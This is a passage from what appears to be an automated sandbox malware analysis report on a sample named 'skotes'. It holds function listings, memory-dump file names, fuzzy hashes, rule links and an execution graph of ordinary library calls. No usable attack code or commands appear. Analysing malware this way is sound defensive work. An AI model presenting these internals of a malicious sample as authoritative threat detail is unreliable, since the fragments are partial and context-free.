                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f173e43fa50d97f3562659e8bd58af8c8c5b65d5017bf9c1bd87194a4fcc4126
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF0B43294522766EF213A669F03F6F7758DF853B0B1A8039BD04A71C1DA20DC01B5E0

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 00F92EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 57040152-0
                                                                                                                                                                                                                                                                            • Opcode ID: 66cfd54177f6dd9568cd2db78e9b99ace10dc2dc45bb3a7023d43e4907b1db21
                                                                                                                                                                                                                                                                            • Instruction ID: 1b11275a18ca85801b4d7d35d400c40e7547d8d53bf389eb42e756726f8b090e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66cfd54177f6dd9568cd2db78e9b99ace10dc2dc45bb3a7023d43e4907b1db21
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36A1BEB1E01205AFEF21DF64C944B6AB7E8FF15324F048129E816D7251EB35EA04EBD1
                                                                                                                                                                                                                                                                            Function 00FCCBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                            • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                                            • Instruction ID: 626ac3f6b1b4a763d9f6c812a8b88966ad7a624f591a556a40da076f1d4ee5ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB11632D042879FDB15CF68C942FAEBBE5EF46350F14416EE859EB241D6348D42DBA0
                                                                                                                                                                                                                                                                            Function 00FABB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8d0563e0e61908935669a3166714e1a4017d17fa9331819d45aae9006afb465a
                                                                                                                                                                                                                                                                            • Instruction ID: e1a4399e07478697e5d435693f9ef2a85e4eef3c1f3ff2425625cac723c1c542
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d0563e0e61908935669a3166714e1a4017d17fa9331819d45aae9006afb465a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F212FB1E00119AFDF00EFA4DC859BEB7B9EF49710F110015F505AB251DB749D41ABE1

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:9.1%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:1.7%
                                                                                                                                                                                                                                                                            Total number of Nodes:1951
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:44
                                                                                                                                                                                                                                                                            execution_graph 26468 6aab29 26469 6aabd1 26468->26469 26472 6a0524 SetConsoleCtrlHandler 26469->26472 26473 693a42 26474 693c87 26473->26474 26475 693a4e 26473->26475 26475->26474 26511 68b2a0 VariantClear 26475->26511 26477 693ab7 26477->26474 26512 68b2a0 VariantClear 26477->26512 26479 693ad4 26479->26474 26513 68b2a0 VariantClear 26479->26513 26481 693af1 26481->26474 26514 68b2a0 VariantClear 26481->26514 26483 693b0e 26483->26474 26515 68b2a0 VariantClear 26483->26515 26485 693b2b 26485->26474 26516 68b2a0 VariantClear 26485->26516 26487 693b48 26487->26474 26517 66450c 26487->26517 26491 693b6d 26492 693b97 26491->26492 26524 66339c 26491->26524 26494 693c72 free free 26492->26494 26495 693c29 26492->26495 26496 693bcd 26492->26496 26494->26474 26536 689190 CharUpperW CharUpperW 26495->26536 26498 663208 2 API calls 26496->26498 26500 693bd7 26498->26500 26499 693c36 26537 68005c 10 API calls 26499->26537 26502 663208 2 API calls 26500->26502 26504 693be4 26502->26504 26503 693c5a 26505 663404 4 API calls 26503->26505 26529 68005c 10 API calls 26504->26529 26507 693c66 free 26505->26507 26507->26494 26508 693bfa 26530 663404 26508->26530 26511->26477 26512->26479 26513->26481 26514->26483 26515->26485 26516->26487 26518 664529 26517->26518 26538 663274 26518->26538 26520 66453c 26521 663208 26520->26521 26522 662130 2 API calls 26521->26522 26523 663222 26522->26523 26523->26491 26525 6633b2 26524->26525 26526 6633e2 memmove 26525->26526 26527 662130 2 API calls 26525->26527 26526->26492 26528 6633d1 free 26527->26528 26528->26526 26529->26508 26531 663451 free free free 26530->26531 26532 663418 26530->26532 26531->26494 26533 66343c memmove 26532->26533 26534 662130 2 API calls 26532->26534 26533->26531 26535 66342b free 26534->26535 26535->26533 26536->26499 26537->26503 26539 663289 26538->26539 26542 662fbc 26539->26542 26545 662130 malloc 26542->26545 26546 662155 memmove 26545->26546 26547 66213f _CxxThrowException 26545->26547 26546->26520 26547->26546 26548 671e0c 26549 671e3f 26548->26549 26550 671e30 26548->26550 26550->26549 26552 6a0a1c EnterCriticalSection 26550->26552 26553 6a0a53 26552->26553 26554 6a0a60 LeaveCriticalSection 26552->26554 26556 6ab480 26553->26556 26554->26549 26557 6ab49e GetTickCount 26556->26557 26558 6ab4a7 26556->26558 26557->26558 26559 6ab50c 26558->26559 26562 6ab7aa 26558->26562 26563 6ab4d8 strcmp 26558->26563 26559->26562 26597 6ab264 26559->26597 26562->26554 26563->26559 26565 6ab4ec 26563->26565 26564 6ab575 26603 662cdc 26564->26603 26565->26559 26568 6ab4f7 wcscmp 26565->26568 26566 6ab55e strcmp 26566->26562 26566->26564 26568->26559 26569 6ab714 26573 6ab72c 26569->26573 26574 6ab71c strcmp 26569->26574 26570 6ab584 26571 6ab5c8 26570->26571 26617 662db8 26570->26617 26578 6ab5fd 26571->26578 26621 662e04 malloc _CxxThrowException memmove free _CxxThrowException 26571->26621 26608 6ab1c8 26573->26608 26574->26573 26576 6ab76a 26574->26576 26579 662cdc 3 API calls 26576->26579 26578->26569 26581 663404 4 API calls 26578->26581 26583 6ab79a 26579->26583 26582 6ab646 26581->26582 26622 662438 9 API calls 26582->26622 26587 663404 4 API calls 26583->26587 26584 6ab75e 26586 662cdc 3 API calls 26584->26586 26585 6ab752 26627 6622e4 fflush 26585->26627 26586->26576 26587->26562 26591 663404 4 API calls 26594 6ab663 26591->26594 26594->26591 26596 6ab6f0 26594->26596 26623 6638c8 memmove 26594->26623 26624 663a64 6 API calls 26594->26624 26625 662438 9 API calls 26594->26625 26626 662e04 malloc _CxxThrowException memmove free _CxxThrowException 26596->26626 26598 6ab27e 26597->26598 26599 6ab2a8 strlen 26598->26599 26602 6ab2c9 26599->26602 26600 662db8 5 API calls 26601 6ab305 26600->26601 26601->26564 26601->26566 26602->26600 26604 662cf0 26603->26604 26605 662d11 26603->26605 26604->26605 26606 662130 2 API calls 26604->26606 26605->26570 26607 662d00 free 26606->26607 26607->26605 26609 6ab238 26608->26609 26610 6ab1e2 26608->26610 26612 6ab249 fputs 26609->26612 26629 6622e4 fflush 26609->26629 26611 6ab1f3 26610->26611 26628 662b04 malloc _CxxThrowException _CxxThrowException free 26610->26628 26615 6ab215 fputs 26611->26615 26616 6ab205 memset 26611->26616 26612->26584 26612->26585 26615->26609 26616->26615 26618 662dcd 26617->26618 26630 662b9c 26618->26630 26621->26578 26622->26594 26623->26594 26624->26594 26625->26594 26626->26569 26627->26584 26628->26611 26629->26612 26631 662bc3 26630->26631 26632 662bae 26630->26632 26631->26571 26634 662a9c malloc _CxxThrowException memmove free _CxxThrowException 26632->26634 26634->26631 26635 6942a2 26636 6942b8 26635->26636 26725 6840c4 26636->26725 26639 663404 4 API calls 26640 694370 26639->26640 26641 6945d8 26640->26641 26642 6943b1 26640->26642 26643 663404 4 API calls 26641->26643 26644 6943b9 26642->26644 26645 6946c5 free free 26642->26645 26646 69463b 26643->26646 26728 68c684 26644->26728 26647 68419c 7 API calls 26645->26647 26650 663404 4 API calls 26646->26650 26689 694519 26647->26689 26653 69464c 26650->26653 26651 694728 free free 26655 68419c 7 API calls 26651->26655 26652 6943dd 26654 662130 2 API calls 26652->26654 26656 663404 4 API calls 26653->26656 26657 6943e7 26654->26657 26655->26689 26658 69465d free free 26656->26658 26659 694401 26657->26659 26742 68caac malloc _CxxThrowException memmove 26657->26742 26660 68419c 7 API calls 26658->26660 26732 66b8f0 26659->26732 26660->26689 26667 694030 26668 694035 memmove 26667->26668 26669 694054 memmove 